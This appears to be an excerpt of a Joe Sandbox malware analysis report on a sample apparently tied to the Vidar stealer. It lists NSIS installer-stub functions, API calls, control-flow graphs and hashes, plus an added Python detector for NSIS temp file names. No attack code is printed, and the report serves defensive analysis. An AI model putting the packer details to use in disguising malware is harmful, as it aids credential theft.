                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                          • API String ID: 3156913733-2180253247
                                                                          • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                          • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                                          Control-flow Graph

                                                                          control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: nsa
                                                                          • API String ID: 1716503409-2209301699
                                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
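
The function at 405e7f above (GetTickCount followed by GetTempFileNameW with the "nsa" string, retried in a loop) is the NSIS installer stub's temp-file helper; together with the "NSIS Error", "WriteINIStr:" and "ExecShell:" strings in the neighbouring functions it shows that these routines are the NSIS installer runtime wrapped around the sample, not the Vidar payload itself, so they should be triaged as packer code. The Python below is an added example, not code from this report, from Joe Sandbox or from the NSIS project: it models the name the stub produces and flags matching file-create events in a constructed log. The mapping of the tick count onto the prefix's third letter, and the reuse of the name as the stub's plugin directory, are taken from the NSIS exehead source (my_GetTempFileName in util.c) rather than from anything shown in this report; the "process|operation|path" log format and the sample events are constructed for the example.

```python
"""Added example (not from the Joe Sandbox report or the NSIS project).

Models the temp-file naming of the NSIS installer stub seen at 0x405e7f
(GetTickCount -> GetTempFileNameW with the "nsa" prefix, retried in a
loop) and flags matching file-create events in a constructed log.
"""
import re
from typing import Iterable, List, Tuple


def nsis_temp_prefix(tick_count: int) -> str:
    """Prefix the stub passes to GetTempFileNameW for a given tick count.

    The stub starts from the literal "nsa" and adds GetTickCount() % 26 to
    the third character, so the prefix is "ns" plus one lowercase letter.
    (Taken from NSIS Source/exehead/util.c, my_GetTempFileName; the report
    only shows the API pair and the "nsa" string.)
    """
    return "ns" + chr(ord("a") + tick_count % 26)


# GetTempFileNameW(dir, prefix, 0, buf) yields <dir>\<prefix><hex>.tmp with up
# to four hex digits.  Children of that name are matched too, because the stub
# deletes the file and recreates the name as its plugin directory (also from
# the NSIS source, not from this report).
NSIS_TMP_RE = re.compile(
    r"^(?P<dir>.*\\)ns[a-z](?P<uniq>[0-9a-f]{1,4})\.tmp(?:\\.*)?$",
    re.IGNORECASE,
)


def is_nsis_temp_path(path: str) -> bool:
    """True if `path` is an NSIS-style temp file/dir or lies beneath one."""
    return NSIS_TMP_RE.match(path) is not None


def find_nsis_temp_files(events: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (process, path) for every CreateFile event on an NSIS temp name.

    Event lines use a constructed 'process|operation|path' format for this
    example; adapt the split to your own file-monitor export.
    """
    hits: List[Tuple[str, str]] = []
    for line in events:
        proc, op, path = line.rstrip("\n").split("|", 2)
        if op == "CreateFile" and is_nsis_temp_path(path):
            hits.append((proc, path))
    return hits


# Constructed sample events, not taken from the report.
SAMPLE_EVENTS = [
    r"lem.exe|CreateFile|C:\Users\user\AppData\Local\Temp\nsa1C4F.tmp",
    r"lem.exe|CreateFile|C:\Users\user\AppData\Local\Temp\nsq7B2.tmp",
    r"lem.exe|CreateFile|C:\Users\user\AppData\Local\Temp\nsa1C4F.tmp\System.dll",
    r"notepad.exe|CreateFile|C:\Users\user\AppData\Local\Temp\tmpA1B2.tmp",
    r"svchost.exe|CreateFile|C:\Windows\Temp\nsz4.tmp",
]

if __name__ == "__main__":
    for proc, path in find_nsis_temp_files(SAMPLE_EVENTS):
        print(f"{proc}: {path}")
```

The pattern is a packer indicator, not a verdict: legitimate NSIS installers produce exactly the same names, so in a detection rule pair it with the process being an unsigned or unexpected executable, or with the "NSIS Error" string and Vidar-specific indicators from the rest of this report.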

                                                                          Control-flow Graph

                                                                          control_flow_graph 758 4078c5-4078cb 759 4078d0-4078eb 758->759 760 4078cd-4078cf 758->760 761 407aeb-407aff 759->761 762 407bad-407bba 759->762 760->759 764 407b01-407b17 761->764 765 407b19-407b2c 761->765 763 407be7-407beb 762->763 766 407c4a-407c5d 763->766 767 407bed-407c0c 763->767 768 407b33-407b3a 764->768 765->768 771 407c65-407c68 766->771 772 407c25-407c39 767->772 773 407c0e-407c23 767->773 769 407b61-407b64 768->769 770 407b3c-407b40 768->770 769->771 774 407b46-407b5e 770->774 775 407ccd-407cd4 770->775 779 407350 771->779 780 407cec 771->780 776 407c3c-407c43 772->776 773->776 774->769 778 407cdd-407cea 775->778 781 407be1-407be4 776->781 782 407c45 776->782 783 407cef-407cf6 778->783 784 407357-40735b 779->784 785 40749b-4074b6 779->785 786 40746d-407471 779->786 787 4073ff-407403 779->787 780->783 781->763 789 407cd6 782->789 790 407bc6-407bde 782->790 784->778 792 407361-40736e 784->792 785->761 793 407c76-407c7d 786->793 794 407477-40748b 786->794 795 407409-407420 787->795 796 407c6d-407c74 787->796 789->778 790->781 792->780 797 407374-4073ba 792->797 793->778 798 40748e-407496 794->798 799 407423-407427 795->799 796->778 801 4073e2-4073e4 797->801 802 4073bc-4073c0 797->802 798->786 803 407498 798->803 799->787 800 407429-40742f 799->800 804 407431-407438 800->804 805 407459-40746b 800->805 808 4073f5-4073fd 801->808 809 4073e6-4073f3 801->809 806 4073c2-4073c5 GlobalFree 802->806 807 4073cb-4073d9 GlobalAlloc 802->807 803->785 810 407443-407453 GlobalAlloc 804->810 811 40743a-40743d GlobalFree 804->811 805->798 806->807 807->780 812 4073df 807->812 808->799 809->808 809->809 810->780 810->805 811->810 812->801
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                                                          Control-flow Graph

                                                                          control_flow_graph 813 407ac3-407ac7 814 407ac9-407bba 813->814 815 407ade-407ae4 813->815 825 407be7-407beb 814->825 817 407aeb-407aff 815->817 818 407b01-407b17 817->818 819 407b19-407b2c 817->819 822 407b33-407b3a 818->822 819->822 823 407b61-407b64 822->823 824 407b3c-407b40 822->824 828 407c65-407c68 823->828 826 407b46-407b5e 824->826 827 407ccd-407cd4 824->827 829 407c4a-407c5d 825->829 830 407bed-407c0c 825->830 826->823 831 407cdd-407cea 827->831 837 407350 828->837 838 407cec 828->838 829->828 833 407c25-407c39 830->833 834 407c0e-407c23 830->834 836 407cef-407cf6 831->836 835 407c3c-407c43 833->835 834->835 844 407be1-407be4 835->844 845 407c45 835->845 839 407357-40735b 837->839 840 40749b-4074b6 837->840 841 40746d-407471 837->841 842 4073ff-407403 837->842 838->836 839->831 846 407361-40736e 839->846 840->817 847 407c76-407c7d 841->847 848 407477-40748b 841->848 850 407409-407420 842->850 851 407c6d-407c74 842->851 844->825 852 407cd6 845->852 853 407bc6-407bde 845->853 846->838 854 407374-4073ba 846->854 847->831 855 40748e-407496 848->855 856 407423-407427 850->856 851->831 852->831 853->844 858 4073e2-4073e4 854->858 859 4073bc-4073c0 854->859 855->841 860 407498 855->860 856->842 857 407429-40742f 856->857 861 407431-407438 857->861 862 407459-40746b 857->862 865 4073f5-4073fd 858->865 866 4073e6-4073f3 858->866 863 4073c2-4073c5 GlobalFree 859->863 864 4073cb-4073d9 GlobalAlloc 859->864 860->840 867 407443-407453 GlobalAlloc 861->867 868 40743a-40743d GlobalFree 861->868 862->855 863->864 864->838 869 4073df 864->869 865->856 866->865 866->866 867->838 867->862 868->867 869->858
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                          APIs
                                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 3394109436-0
                                                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                          APIs
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
